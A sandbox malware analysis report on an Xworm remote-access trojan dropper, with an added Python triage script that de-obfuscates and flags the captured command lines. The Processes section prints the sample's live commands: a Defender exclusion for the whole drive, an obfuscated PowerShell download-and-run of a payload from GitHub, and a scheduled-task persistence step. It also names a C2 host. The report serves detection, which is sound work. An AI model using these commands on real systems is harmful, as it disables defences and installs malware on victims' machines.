Malware Analysis Report

2024-11-16 13:35

Sample ID 240526-xf436sga7y
Target SexyBoy.bat
SHA256 9123d299aaf0d551dc6a10b83ae8143586c68279af85fab5e2291993c550179c
Tags
xworm execution persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9123d299aaf0d551dc6a10b83ae8143586c68279af85fab5e2291993c550179c

Threat Level: Known bad

The file SexyBoy.bat was found to be: Known bad.

Malicious Activity Summary

xworm execution persistence rat trojan

Detect Xworm Payload

Xworm

Downloads MZ/PE file

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-26 18:48

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-26 18:48

Reported

2024-05-26 18:49

Platform

win10-20240404-en

Max time kernel

31s

Max time network

40s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SexyBoy.bat"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Security.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Windows\CurrentVersion\Run\Security = "C:\\Users\\Admin\\AppData\\Roaming\\Security.exe" C:\Users\Admin\AppData\Local\Temp\Security.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Security.exe N/A

Tokens 33 to 36 are privilege LUIDs the sandbox did not resolve to names; in winnt.h they are SeIncreaseWorkingSetPrivilege (33), SeTimeZonePrivilege (34), SeCreateSymbolicLinkPrivilege (35) and SeDelegateSessionUserImpersonatePrivilege (36). The rows from SeIncreaseQuotaPrivilege through 36 run in ascending LUID order and cover the disabled-by-default privileges of an administrator token, the pattern of a process enabling everything its token holds in one sweep rather than requesting a single privilege. The isolated SeDebugPrivilege rows, including the final one from Security.exe, are separate requests.

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SexyBoy.bat"

C:\Windows\system32\net.exe

NET FILE

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 FILE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Add-MpPreference -ExclusionPath 'C:\'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/Proxyonly/wewewewe/raw/main/S"e"cur"i"ty.exe', 'C:\Users\Admin\AppData\Local\Temp\Se"c"urity.exe')"

C:\Users\Admin\AppData\Local\Temp\Security.exe

"C:\Users\Admin\AppData\Local\Temp\Se"c"urity.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Security" /tr "C:\Users\Admin\AppData\Roaming\Security.exe"
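The command lines above show two things a triage script has to handle. First, the file name is spelled `S"e"cur"i"ty.exe` in the download URL, the destination path and the later process launch: Windows argument parsing drops double quotes that only toggle quoting, so powershell.exe and the loader see `Security.exe`, which is why the Files section lists `C:\Users\Admin\AppData\Local\Temp\Security.exe`. Naive string matching on the raw command line misses the file name; normalising first does not. Second, the actions worth flagging are the `Add-MpPreference -ExclusionPath 'C:\'` call, which excludes the entire system drive from Defender scanning before the download, the WebClient download from GitHub, the launch of the dropped file from %TEMP%, and the one-minute `/RL HIGHEST` scheduled task pointing at `C:\Users\Admin\AppData\Roaming\Security.exe` (the same path the Run key uses, and one the Files section does not list, so the copy to Roaming was not captured). The `NET FILE` call is typical of batch droppers as an elevation check, since it fails without administrator rights. The following script is an added example written for this page, not code from the sandbox or from the sample; the command lines are copied from the Processes section, and the ATT&CK technique IDs are the editor's mapping rather than the report's.

```python
"""Triage helpers for the SexyBoy.bat detonation (added example, not part of
the sandbox report): undo the quote obfuscation seen in the captured command
lines, then flag the dropper's tell-tale actions with their ATT&CK IDs."""
import re
from typing import List, NamedTuple, Optional

# Command lines copied from the report's Processes section, in detonation order.
SAMPLE_CMDLINES = [
    r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SexyBoy.bat"',
    r'NET FILE',
    r'C:\Windows\system32\net1 FILE',
    r'''powershell -command "Add-MpPreference -ExclusionPath 'C:\'"''',
    r'''powershell -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/Proxyonly/wewewewe/raw/main/S"e"cur"i"ty.exe', 'C:\Users\Admin\AppData\Local\Temp\Se"c"urity.exe')"''',
    r'"C:\Users\Admin\AppData\Local\Temp\Se"c"urity.exe"',
    r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Security" /tr "C:\Users\Admin\AppData\Roaming\Security.exe"',
]


class Finding(NamedTuple):
    technique: str   # MITRE ATT&CK technique ID (editor's mapping)
    summary: str
    cmdline: str     # normalised (de-quoted) command line


def split_args(cmdline: str) -> List[str]:
    """Split a Windows command line the way CommandLineToArgvW does for the
    common case: whitespace separates arguments, a double quote toggles a
    quoted span and is itself dropped. Backslash-escaping of quotes is ignored
    because none of the report's command lines use it. The net effect is that
    Se"c"urity.exe and Security.exe yield the same token."""
    args: List[str] = []
    cur: List[str] = []
    in_quote = have_token = False
    for ch in cmdline:
        if ch == '"':
            in_quote = not in_quote
            have_token = True                      # "" is a valid empty argument
        elif ch in " \t" and not in_quote:
            if have_token:
                args.append("".join(cur))
                cur, have_token = [], False
        else:
            cur.append(ch)
            have_token = True
    if have_token:
        args.append("".join(cur))
    return args


def normalize(cmdline: str) -> str:
    """De-quoted command line, suitable for IOC/string matching."""
    return " ".join(split_args(cmdline))


def _opt(args: List[str], flag: str) -> Optional[str]:
    """Value following a case-insensitive flag such as /sc, or None."""
    low = [a.lower() for a in args]
    if flag.lower() in low:
        i = low.index(flag.lower())
        if i + 1 < len(args):
            return args[i + 1]
    return None


DOWNLOAD_RE = re.compile(r"DownloadFile\(\s*'([^']+)'\s*,\s*'([^']+)'\s*\)", re.I)
EXCLUSION_RE = re.compile(r"-ExclusionPath\s+'([^']*)'", re.I)
TEMP_EXE_RE = re.compile(r"^[a-z]:\\users\\[^\\]+\\appdata\\local\\temp\\.+\.exe$", re.I)


def triage(cmdlines: List[str]) -> List[Finding]:
    """Return one Finding per suspicious action, in the order the lines appear."""
    findings: List[Finding] = []
    for raw in cmdlines:
        args = split_args(raw)
        if not args:
            continue
        norm = " ".join(args)
        image = args[0].lower()

        # Defender exclusion for the whole system drive (T1562.001 Impair Defenses).
        if "add-mppreference" in norm.lower():
            m = EXCLUSION_RE.search(norm)
            findings.append(Finding("T1562.001",
                f"Defender exclusion added for {m.group(1) if m else '?'}", norm))

        # WebClient download; quote stripping reveals the real URL and path (T1105).
        m = DOWNLOAD_RE.search(norm)
        if m:
            findings.append(Finding("T1105", f"download {m.group(1)} -> {m.group(2)}", norm))

        # Execution of a freshly dropped executable out of %TEMP% (T1204.002).
        if TEMP_EXE_RE.match(image):
            findings.append(Finding("T1204.002", f"executed dropped file {args[0]}", norm))

        # Minute-interval, highest-run-level scheduled task (T1053.005).
        if image.endswith("schtasks.exe") and "/create" in (a.lower() for a in args):
            findings.append(Finding("T1053.005",
                f"task {_opt(args, '/tn')!r} runs {_opt(args, '/tr')} every "
                f"{_opt(args, '/mo')} {_opt(args, '/sc')}, run level {_opt(args, '/RL')}", norm))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_CMDLINES):
        print(f"{f.technique:10} {f.summary}")
```

Run it directly to print the four findings for this detonation. The normalisation step is the part worth reusing: apply `normalize()` to process-creation telemetry before matching file names or URLs, otherwise any IOC containing the quoted spelling will not match the path the sandbox (and the victim's disk) actually records.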

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 paris-disciplinary.gl.at.ply.gg udp
US 147.185.221.19:63286 paris-disciplinary.gl.at.ply.gg tcp
US 8.8.8.8:53 19.221.185.147.in-addr.arpa udp
US 147.185.221.19:63286 paris-disciplinary.gl.at.ply.gg tcp
US 147.185.221.19:63286 paris-disciplinary.gl.at.ply.gg tcp

The github.com and raw.githubusercontent.com connections are the payload fetch: the DownloadFile URL on github.com redirects to raw.githubusercontent.com, which the signatures list as the abused hosting service. The three TCP connections to 147.185.221.19:63286 (paris-disciplinary.gl.at.ply.gg, a hostname under the playit.gg tunnelling service) are the only non-GitHub destination in the capture and are consistent with the Xworm C2 channel, although the report's signatures do not label them as such. The in-addr.arpa rows are reverse lookups of those same addresses.

Files

memory/4116-0-0x00007FF8E5173000-0x00007FF8E5174000-memory.dmp

memory/4116-5-0x000001D8B1100000-0x000001D8B1122000-memory.dmp

memory/4116-7-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp

memory/4116-9-0x000001D8B12B0000-0x000001D8B1326000-memory.dmp

memory/4116-10-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o05aqsrn.chy.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

This file is written by powershell.exe itself at startup to test whether script execution is constrained by AppLocker/WDAC; its content is the single character 1 (the hashes above are those of "1"). It is a PowerShell artifact, not something the sample dropped.

memory/4116-23-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp

memory/4116-49-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp

memory/4116-50-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ad5cd538ca58cb28ede39c108acb5785
SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Written by the .NET runtime when powershell.exe starts; a benign runtime artifact, not a dropped file.

memory/4980-57-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7b1f83ac48cbe6055096e17c831c8241
SHA1 29bbd8eceafbf7dfaab51aeb06e62f8e79385180
SHA256 69ae18fb29c7d6d3c7b0ac41c707509410b693d0174bb929bbe53e167e62cc77
SHA512 84f40c1f902a9f5fa2dbbf0e612a4f452a4f3772dca5b2d98bbe09569ccbf41de6c7b06e93736f73d0b7fcaf4997b41417682a45c3b51b86d8433fb70a25ebf6

PowerShell's cached non-interactive startup profile data; benign, like the CLR usage log above. The only file in this section attributable to the sample is Security.exe below.

memory/4980-60-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp

memory/4980-69-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp

memory/4980-79-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Security.exe

MD5 8cfcf2a8ff7ed19f56c4ba6ad32ff237
SHA1 3bfa32a1a8f738a8390fb029c098d6db43f000ee
SHA256 55de204273cd069d114a5928de0af46b93bde9b437bd01ae10c443d48aba1276
SHA512 46b4933efeff1075c1b629c1c00f077c9a5ffc0ba0cdd01ad393be31064c65e75982988153fe0a393c3519c3a922292efc369826e32bac9aa96a0cce7de2d2cb

memory/3144-83-0x0000000000EC0000-0x0000000000ED6000-memory.dmp